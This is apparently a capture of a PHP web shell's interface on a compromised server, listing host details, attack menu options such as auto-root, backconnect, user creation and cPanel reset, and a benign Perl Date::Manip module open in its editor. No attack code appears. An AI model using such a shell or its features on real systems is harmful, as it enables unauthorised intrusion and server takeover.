Linux server.thearyasamaj.org 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
Apache
: 103.90.241.146 | : 216.73.216.136
Cant Read [ /etc/named.conf ]
5.6.40
ftpuser@mantra.thearyasamaj.org
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
perl5 /
vendor_perl /
Date /
Manip /
Lang /
[ HOME SHELL ]
Name
Size
Permission
Action
catalan.pm
5.07
KB
-rw-r--r--
catalan.pod
10.04
KB
-rw-r--r--
danish.pm
4.29
KB
-rw-r--r--
danish.pod
9.23
KB
-rw-r--r--
dutch.pm
7.05
KB
-rw-r--r--
dutch.pod
11.08
KB
-rw-r--r--
english.pm
4.58
KB
-rw-r--r--
english.pod
9.57
KB
-rw-r--r--
finnish.pm
8.2
KB
-rw-r--r--
finnish.pod
12.33
KB
-rw-r--r--
french.pm
5.88
KB
-rw-r--r--
french.pod
10.77
KB
-rw-r--r--
german.pm
6.32
KB
-rw-r--r--
german.pod
10.67
KB
-rw-r--r--
index.pm
2.14
KB
-rw-r--r--
italian.pm
4.34
KB
-rw-r--r--
italian.pod
9.36
KB
-rw-r--r--
norwegian.pm
4.63
KB
-rw-r--r--
norwegian.pod
9.6
KB
-rw-r--r--
polish.pm
7.91
KB
-rw-r--r--
polish.pod
11.99
KB
-rw-r--r--
portugue.pm
5.87
KB
-rw-r--r--
portugue.pod
10.72
KB
-rw-r--r--
romanian.pm
7.76
KB
-rw-r--r--
romanian.pod
11.6
KB
-rw-r--r--
russian.pm
10.41
KB
-rw-r--r--
russian.pod
14.56
KB
-rw-r--r--
spanish.pm
9.76
KB
-rw-r--r--
spanish.pod
12.77
KB
-rw-r--r--
swedish.pm
4.89
KB
-rw-r--r--
swedish.pod
9.81
KB
-rw-r--r--
turkish.pm
5.26
KB
-rw-r--r--
turkish.pod
10.29
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.pm
package Date::Manip::Lang::index; # Copyright (c) 2003-2017 Sullivan Beck. All rights reserved. # This program is free software; you can redistribute it and/or modify it # under the same terms as Perl itself. ######################################################################## ######################################################################## =pod =head1 NAME Date::Manip::Lang::index - An index of languages supported by Date::Manip =head1 SYNPOSIS This module is not intended to be used directly. Other Date::Manip modules will load it as needed. =cut require 5.010000; use strict; use warnings; our($VERSION); $VERSION='6.60'; our(%Lang); # A list of languages, and their module name %Lang = qw( catalan catalan ca catalan danish danish da danish dutch dutch nederlands dutch nl dutch english english en english en_us english finnish finnish fi finnish fi_fi finnish french french fr french fr_fr french german german de german de_de german italian italian it italian it_it italian norwegian norwegian nb norwegian nb_no norwegian polish polish pl polish pl_pl polish portuguese portugue pt portugue pt_pt portugue romanian romanian ro romanian ro_ro romanian russian russian ru russian ru_ru russian spanish spanish es spanish es_es spanish swedish swedish sv swedish turkish turkish tr turkish tr_tr turkish ); 1;
Close